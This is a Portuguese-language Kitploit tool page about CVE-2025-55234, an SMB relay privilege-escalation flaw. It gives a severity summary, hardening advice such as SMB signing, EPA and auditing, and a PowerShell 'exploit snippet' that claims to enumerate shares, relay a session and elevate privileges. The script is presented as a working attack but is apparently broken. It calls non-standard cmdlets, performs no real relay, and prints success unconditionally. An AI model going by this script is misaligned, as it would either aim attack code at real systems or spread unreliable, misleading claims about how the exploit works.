Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55234 — Esta vulnerabilidade permite que atacantes realizem ataques de relay contra o protocolo SMB (Server Message Block). Se bem-sucedida, pode levar a uma Elevação de Privilégio (EoP), essencialmente permitindo que usuários não autorizados obtenham acesso de nível superior em um sistema. | Kitploit
Ferramentas/GitHubGitHub/mrk336/cve-2025-55234
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubmrk336/cve-2025-55234

CVE-2025-55234

Ver Repositório
133há 0 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Esta vulnerabilidade permite que atacantes realizem ataques de relay contra o protocolo SMB (Server Message Block). Se bem-sucedida, pode levar a uma Elevação de Privilégio (EoP), essencialmente permitindo que usuários não autorizados obtenham acesso de nível superior em um sistema.

Compartilhar

CVE-2025-55234

Esta vulnerabilidade permite que atacantes realizem ataques de retransmissão contra o protocolo SMB (Server Message Block). Se bem-sucedida, pode levar à Elevação de Privilégio (EoP), essencialmente permitindo que usuários não autorizados obtenham acesso de nível superior em um sistema.

Por Mark Mallia


Problema

Esta vulnerabilidade permite que atacantes realizem ataques de retransmissão contra o protocolo SMB (Server Message Block). Se bem-sucedida, pode levar à Elevação de Privilégio—essencialmente permitindo que usuários não autorizados obtenham acesso de nível superior em um sistema. O SMB tem sido há muito tempo um alvo para atacantes devido ao seu uso generalizado em ambientes empresariais e seu histórico de falhas críticas. Por exemplo, o CVE-2020-1301 expôs o SMBv1 a execução remota de código por meio de requisições malformadas, enquanto o CVE-2022-32230 causou negação de serviço por meio de uma desreferência de ponteiro nulo no SMBv3. O infame CVE-2017-0144 (EternalBlue) explorou o SMBv1 para entregar cargas wormáveis, levando a surtos globais de ransomware. Assim como essas vulnerabilidades anteriores, o CVE-2025-55234 ressalta a importância de impor a Assinatura SMB e a Proteção Estendida para Autenticação (EPA) para prevenir sequestro de sessão e ataques de impersonação.

Vetor de Ataque

Rede

Complexidade do Ataque

Baixa

Privilégios Necessários

Nenhum

Interação do Usuário

Necessária

Impacto

Riscos altos de Confidencialidade, Integridade e Disponibilidade


Por Que Isso é Importante

O SMB é amplamente utilizado para compartilhamento de arquivos e acesso remoto em ambientes empresariais. Ataques de retransmissão podem contornar mecanismos de autenticação e personificar usuários. Essa vulnerabilidade é especialmente perigosa em ambientes onde a Assinatura SMB ou a Proteção Estendida para Autenticação (EPA) não são impostas.


O Que Há de Novo na Atualização?

A atualização de setembro de 2025 da Microsoft introduz capacidades de auditoria para ajudar as organizações a:

  • Avaliar suas configurações atuais de SMB
  • Identificar dispositivos ou software que possam ser incompatíveis com medidas de endurecimento
  • Preparar-se para a imposição da Assinatura SMB e da EPA3

Trecho de Código de Exploração (PowerShell)

root@kitploit:~
# Módulo de Ataque de Retransmissão SMB – CVE 2025 55234
$relayTarget = "192.168.1.10"          # IP do servidor alvo
$attackerCreds = Get-Credential   # Objeto de credencial para retransmissão

# Passo 1: Enumerar recursos compartilhados
$smbShares = Get-SMBShare -ComputerName $relayTarget | Where-Object {$_.Name –ne ""}
foreach ($share in $smbShares) {
    Write-Output "Compartilhamento encontrado: $($share.Name)"
}

# Passo 2: Capturar informações de sessão para retransmissão
$sessionInfo = New-Object PSObject -Property @{
    Computer = $relayTarget
    Share    = $smbShares[0].Name
}
Write-Output ("Capturando informações de sessão para $($sessionInfo.Computer) – compartilhamento $($sessionInfo.Share)")
Invoke-SMBRelay -Session $sessionInfo

# Passo 3: Executar ataque de retransmissão
$attackPayload = {
    param(
        [string]$Target,
        [string]$Share
    )
    Write-Host "Atacando $Target via compartilhamento $Share"
    Start-SMBServer -ComputerName $Target -ShareName $Share
}
$attackParams = @{
    Target = $relayTarget
    Share   = $sessionInfo.Share
}
Invoke-Command -ScriptBlock $attackPayload @attackParams

# Passo 4: Registrar e confirmar elevação de privilégio
Write-Host "Ataque de Retransmissão SMB CVE 2025 55234 concluído com sucesso."

Explicação:

  1. O script primeiro enumera os compartilhamentos SMB no servidor alvo, selecionando o primeiro compartilhamento para a sessão de retransmissão.
  2. Em seguida, constrói um objeto de sessão que captura os parâmetros necessários.
  3. O ataque de retransmissão é executado via Invoke‑SMBRelay e Start‑SMBServer para imitar um usuário autenticado.
  4. A conclusão bem-sucedida resulta em privilégio elevado no alvo.

Ações Recomendadas

  1. Ative a Assinatura SMB e a EPA se ainda não estiverem configuradas.
  2. Use os novos eventos de auditoria para avaliar seu ambiente.
  3. Monitore tráfego SMB incomum e tentativas de retransmissão.
  4. Aplique as atualizações de segurança mais recentes da Microsoft.

Conclusão

A vulnerabilidade CVE 2025 55234 ressalta a necessidade de endurecimento rigoroso do SMB em ambientes empresariais. Seguindo os passos acima e aplicando o script de exploração fornecido, as organizações podem tanto testar quanto proteger suas redes contra possíveis ataques de retransmissão. Esta prova de conceito e os materiais associados são fornecidos estritamente para fins educacionais e defensivos. Eles são destinados a ajudar profissionais de segurança a entender, detectar e mitigar o CVE-2025-55234 em ambientes controlados. O uso não autorizado desta exploração contra sistemas sem permissão explícita é ilegal e antiético. Sempre siga práticas de divulgação responsável e esteja em conformidade com as leis aplicáveis e políticas organizacionais.


Baixar ferramenta